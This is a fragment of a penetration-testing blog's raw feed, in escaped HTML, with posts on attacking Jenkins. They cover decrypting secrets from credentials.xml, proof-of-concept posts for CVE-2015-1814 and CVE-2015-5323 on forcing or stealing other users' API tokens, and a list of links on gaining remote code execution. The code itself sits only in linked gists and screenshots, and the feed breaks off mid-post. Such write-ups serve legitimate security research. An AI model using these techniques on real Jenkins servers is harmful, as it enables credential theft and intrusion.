#444444;\"\u003EThere is a small bug in the python when it does the regex and i havent bothered to fix it at the time of this post. But here is version where instead of the regex i'm just printing out the values and you can see the decrypted password. The change is line 55.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cscript src=\"https:\/\/gist.github.com\/carnal0wnage\/80611a9c035046b2d400d90303355ff0.js\"\u003E\u003C\/script\u003E\n\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/4.bp.blogspot.com\/-q9IWzXQ1q-w\/XHf8YKse5xI\/AAAAAAAACcU\/W78udeFC_C45zDRN5fvPTaKpVBKSHURmgCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-28%2Bat%2B10.20.54%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"251\" data-original-width=\"1600\" height=\"100\" src=\"https:\/\/4.bp.blogspot.com\/-q9IWzXQ1q-w\/XHf8YKse5xI\/AAAAAAAACcU\/W78udeFC_C45zDRN5fvPTaKpVBKSHURmgCLcBGAs\/s640\/Screen%2BShot%2B2019-02-28%2Bat%2B10.20.54%2BAM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003EEdit 4 March 19: the script only regexs for password (line 72), you might need to swap out the regex if there are ssh keys or other secrets...read the credentials.xml file :-)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EEdit 8 April 19: This tweet outlines another similar way\u0026nbsp;\u0026nbsp;\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Ca href=\"https:\/\/twitter.com\/netmux\/status\/1115237815590236160\" target=\"_blank\"\u003Ehttps:\/\/twitter.com\/netmux\/status\/1115237815590236160\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cstyle type=\"text\/css\"\u003E\np.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f2f2f2; background-color: #000000}\nspan.s1 {font-variant-ligatures: no-common-ligatures}\n\u003C\/style\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/7807981096117925435\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=7807981096117925435","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/7807981096117925435"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/7807981096117925435"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/02\/jenkins-decrypting-credentialsxml.html","title":"Jenkins - decrypting credentials.xml"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/2.bp.blogspot.com\/-XMzdnnVjnMU\/XHf3SeLpK9I\/AAAAAAAACb0\/3ZNuHXY9DHUzsFYaz5Flcn-hJL_VEDp_ACLcBGAs\/s72-c\/Screen%2BShot%2B2019-02-28%2Bat%2B9.55.48%2BAM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-7625918072954327772"},"published":{"$t":"2019-02-27T19:51:00.000-05:00"},"updated":{"$t":"2019-02-27T20:00:20.616-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - SECURITY-180\/CVE-2015-1814 PoC"},"content":{"type":"html","$t":"\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cb\u003EForced API token change\u003C\/b\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cb\u003E\u003Cbr \/\u003E\u003C\/b\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003ESECURITY-180\/CVE-2015-1814\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv\u003E\n\u003Ca href=\"https:\/\/jenkins.io\/security\/advisory\/2015-03-23\/#security-180cve-2015-1814-forced-api-token-change\" target=\"_blank\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003Ehttps:\/\/jenkins.io\/security\/advisory\/2015-03-23\/#security-180cve-2015-1814-forced-api-token-change\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cdiv class=\"sect1\" style=\"background-color: white; box-sizing: border-box; color: #212529;\"\u003E\n\u003Ch2 id=\"affected-versions\" style=\"box-sizing: border-box; color: inherit; line-height: 1.2; margin-bottom: 0.5rem; margin-top: 0px;\"\u003E\n\u003Cspan style=\"font-family: inherit; font-size: small;\"\u003EAffected Versions\u003Cspan style=\"font-stretch: normal; font-weight: 500; line-height: 1; padding: 0.4em 1em 0.4em 0.375em;\"\u003E\u003Ca aria-label=\"Anchor\" class=\"anchorjs-link \" data-anchorjs-icon=\"\" href=\"https:\/\/jenkins.io\/security\/advisory\/2015-03-23\/#affected-versions\" style=\"background-color: transparent; box-sizing: border-box; color: #006699; font-stretch: normal; line-height: 1; opacity: 0; padding: 0.4em 1em 0.4em 0.375em;\"\u003E\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/h2\u003E\n\u003Cdiv class=\"sectionbody\" style=\"box-sizing: border-box;\"\u003E\n\u003Cdiv class=\"ulist\" style=\"box-sizing: border-box;\"\u003E\n\u003Cul style=\"box-sizing: border-box; margin-bottom: 1rem; margin-top: 0px;\"\u003E\n\u003Cli style=\"box-sizing: border-box;\"\u003E\u003Cdiv style=\"box-sizing: border-box; padding: 0px;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EAll Jenkins releases \u0026lt;= 1.605\u003C\/span\u003E\u003C\/div\u003E\n\u003C\/li\u003E\n\u003Cli style=\"box-sizing: border-box;\"\u003E\u003Cdiv style=\"box-sizing: border-box; padding: 0px;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EAll LTS releases \u0026lt;= 1.596.1\u003C\/span\u003E\u003C\/div\u003E\n\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EPoC\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003ETested against Jenkins 1.605\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cscript src=\"https:\/\/gist.github.com\/carnal0wnage\/fad7c95492224e609ddc47fb08ac8438.js\"\u003E\u003C\/script\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/4.bp.blogspot.com\/-dv5CGnEj7vM\/XHcvdVVonbI\/AAAAAAAACbg\/OLAQlbwCxdUVNpc-nke4D5H3Gx0C8zjnQCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-27%2Bat%2B7.46.30%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"455\" data-original-width=\"1600\" height=\"180\" src=\"https:\/\/4.bp.blogspot.com\/-dv5CGnEj7vM\/XHcvdVVonbI\/AAAAAAAACbg\/OLAQlbwCxdUVNpc-nke4D5H3Gx0C8zjnQCLcBGAs\/s640\/Screen%2BShot%2B2019-02-27%2Bat%2B7.46.30%2BPM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EBurp output\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-D1tmH-wiy5g\/XHcvspHKg8I\/AAAAAAAACbk\/3Rt6uwdJiRMsipOZkRWzXJP3nZOqSXTbgCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-27%2Bat%2B7.47.37%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"379\" data-original-width=\"1600\" height=\"150\" src=\"https:\/\/2.bp.blogspot.com\/-D1tmH-wiy5g\/XHcvspHKg8I\/AAAAAAAACbk\/3Rt6uwdJiRMsipOZkRWzXJP3nZOqSXTbgCLcBGAs\/s640\/Screen%2BShot%2B2019-02-27%2Bat%2B7.47.37%2BPM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EValidate new token works\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003C\/div\u003E\n\u003C\/div\u003E\n\u003C\/div\u003E\n\u003Cdiv class=\"sect1\" style=\"background-color: white; box-sizing: border-box; color: #212529; font-family: lato, Roboto, \u0026quot;Open Sans\u0026quot;, sans-serif; font-size: 14px;\"\u003E\n\u003C\/div\u003E\n\u003C\/div\u003E\n"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/7625918072954327772\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=7625918072954327772","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/7625918072954327772"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/7625918072954327772"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/02\/jenkins-security-180cve-2015-1814-poc.html","title":"Jenkins - SECURITY-180\/CVE-2015-1814 PoC"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/4.bp.blogspot.com\/-dv5CGnEj7vM\/XHcvdVVonbI\/AAAAAAAACbg\/OLAQlbwCxdUVNpc-nke4D5H3Gx0C8zjnQCLcBGAs\/s72-c\/Screen%2BShot%2B2019-02-27%2Bat%2B7.46.30%2BPM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-1012991845338227037"},"published":{"$t":"2019-02-27T19:14:00.001-05:00"},"updated":{"$t":"2019-02-27T19:58:55.383-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - SECURITY-200 \/ CVE-2015-5323 PoC"},"content":{"type":"html","$t":"\u003Cdiv style=\"background-color: white; box-sizing: border-box; line-height: 1.2; margin-bottom: 0.5rem; margin-top: 0px;\"\u003E\n\u003Cb\u003E\u003Cspan style=\"font-family: inherit; font-size: large;\"\u003EAPI tokens of other users available to admins\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cdiv style=\"color: #212529;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003ESECURITY-200 \/ CVE-2015-5323\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv style=\"color: #212529;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EAPI tokens of other users were exposed to admins by default. On instances that don’t implicitly grant RunScripts permission to admins, this allowed admins to run scripts with another user’s credentials.\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv style=\"color: #212529;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"font-family: inherit;\"\u003EAffected versions\u003C\/span\u003E\u003C\/b\u003E\u003C\/div\u003E\n\u003Cdiv style=\"color: #212529;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EAll Jenkins main line releases up to and including 1.637\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv style=\"color: #212529;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EAll Jenkins LTS releases up to and including 1.625.1\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv style=\"color: #212529;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"font-family: inherit;\"\u003EPoC\u003C\/span\u003E\u003C\/b\u003E\u003C\/div\u003E\n\u003Cdiv style=\"color: #212529;\"\u003E\n\u003Cscript src=\"https:\/\/gist.github.com\/carnal0wnage\/1f316c01eaa7707c3cc6497ef04857a8.js\"\u003E\u003C\/script\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\n\nTested against Jenkins 1.6.37\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv style=\"color: #212529;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EFrom the script console:\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"sect2\" style=\"background-color: white; box-sizing: border-box; color: #212529; text-align: left; text-indent: 0px;\"\u003E\n\u003Cdiv class=\"paragraph\" style=\"box-sizing: border-box;\"\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"color: #212529; font-style: normal; letter-spacing: normal; margin-left: auto; margin-right: auto; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-Ag04hKntnIc\/XHclZb0VK_I\/AAAAAAAACbM\/r3XVddXgC58mSqqGlTm8rzM7zY6rBZMKwCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-27%2Bat%2B6.59.18%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cimg border=\"0\" data-original-height=\"898\" data-original-width=\"1600\" height=\"356\" src=\"https:\/\/2.bp.blogspot.com\/-Ag04hKntnIc\/XHclZb0VK_I\/AAAAAAAACbM\/r3XVddXgC58mSqqGlTm8rzM7zY6rBZMKwCLcBGAs\/s640\/Screen%2BShot%2B2019-02-27%2Bat%2B6.59.18%2BPM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif; font-size: small;\"\u003Erun some groovy code to get the token of another user\u003C\/span\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cdiv style=\"color: #212529; font-style: normal; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"color: #212529; font-style: normal; letter-spacing: normal; margin-left: auto; margin-right: auto; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-lCfkcZ76NoU\/XHclZfD8ipI\/AAAAAAAACbE\/xe7lBDNyWF4uwdz12LeD_iirhM1tKpPMQCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-27%2Bat%2B6.59.33%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cimg border=\"0\" data-original-height=\"317\" data-original-width=\"1600\" height=\"124\" src=\"https:\/\/1.bp.blogspot.com\/-lCfkcZ76NoU\/XHclZfD8ipI\/AAAAAAAACbE\/xe7lBDNyWF4uwdz12LeD_iirhM1tKpPMQCLcBGAs\/s640\/Screen%2BShot%2B2019-02-27%2Bat%2B6.59.33%2BPM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif; font-size: small;\"\u003Ewrong token\u003C\/span\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cdiv style=\"color: #212529; font-style: normal; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"color: #212529; font-style: normal; letter-spacing: normal; margin-left: auto; margin-right: auto; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-nzUNm-8GkSg\/XHclZTXfE7I\/AAAAAAAACbI\/WPi6xZNNxgkCABGTK05vxIw1aPgjQf2FwCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-27%2Bat%2B6.59.48%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cimg border=\"0\" data-original-height=\"399\" data-original-width=\"1600\" height=\"156\" src=\"https:\/\/1.bp.blogspot.com\/-nzUNm-8GkSg\/XHclZTXfE7I\/AAAAAAAACbI\/WPi6xZNNxgkCABGTK05vxIw1aPgjQf2FwCLcBGAs\/s640\/Screen%2BShot%2B2019-02-27%2Bat%2B6.59.48%2BPM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif; font-size: small;\"\u003Ecorrect token\u003C\/span\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003C\/div\u003E\n\u003C\/div\u003E\n\u003Cdiv style=\"color: #212529;\"\u003E\n\u003Cstyle type=\"text\/css\"\u003E\np.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f2f2f2; background-color: #000000}\nspan.s1 {font-variant-ligatures: no-common-ligatures}\n\u003C\/style\u003E\u003C\/div\u003E\n\u003C\/div\u003E\n"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/1012991845338227037\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=1012991845338227037","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/1012991845338227037"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/1012991845338227037"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/02\/jenkins-security-200-cve-2015-5323-poc.html","title":"Jenkins - SECURITY-200 \/ CVE-2015-5323 PoC"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/2.bp.blogspot.com\/-Ag04hKntnIc\/XHclZb0VK_I\/AAAAAAAACbM\/r3XVddXgC58mSqqGlTm8rzM7zY6rBZMKwCLcBGAs\/s72-c\/Screen%2BShot%2B2019-02-27%2Bat%2B6.59.18%2BPM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-7662540982988985472"},"published":{"$t":"2019-02-27T16:46:00.002-05:00"},"updated":{"$t":"2019-03-05T14:02:39.149-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins Master Post"},"content":{"type":"html","$t":"\u003Cdiv style=\"background-color: white; box-sizing: border-box; line-height: 1.2; margin-bottom: 0.5rem; margin-top: 0px;\"\u003E\n\u003Ch4\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EA collection of posts on attacking Jenkins\u003C\/span\u003E\u003C\/h4\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\n\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"http:\/\/www.labofapenetrationtester.com\/2014\/08\/script-execution-and-privilege-esc-jenkins.html\" target=\"_blank\"\u003Ehttp:\/\/www.labofapenetrationtester.com\/2014\/08\/script-execution-and-privilege-esc-jenkins.html\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EManipulating build steps to get RCE\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/medium.com\/@uranium238\/shodan-jenkins-to-get-rces-on-servers-6b6ec7c960e2\" target=\"_blank\"\u003Ehttps:\/\/medium.com\/@uranium238\/shodan-jenkins-to-get-rces-on-servers-6b6ec7c960e2\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EUsing the terminal plugin to get RCE\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/sharadchhetri.com\/2018\/12\/02\/managing-jenkins-plugins\/\" target=\"_blank\"\u003Ehttps:\/\/sharadchhetri.com\/2018\/12\/02\/managing-jenkins-plugins\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EGetting started with Jenkins Plugins\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cspan style=\"font-family: \u0026quot;trebuchet ms\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Ca href=\"https:\/\/blog.orange.tw\/2019\/01\/hacking-jenkins-part-1-play-with-dynamic-routing.html\" target=\"_blank\"\u003Ehttps:\/\/blog.orange.tw\/2019\/01\/hacking-jenkins-part-1-play-with-dynamic-routing.html\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EVulns in\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\n\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cul\u003E\n\u003Cli\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EPipeline: Declarative Plugin up to and including 1.3.4\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EPipeline: Groovy Plugin up to and including 2.61\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003EScript Security Plugin up to and including 1.49\u003C\/span\u003E\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , 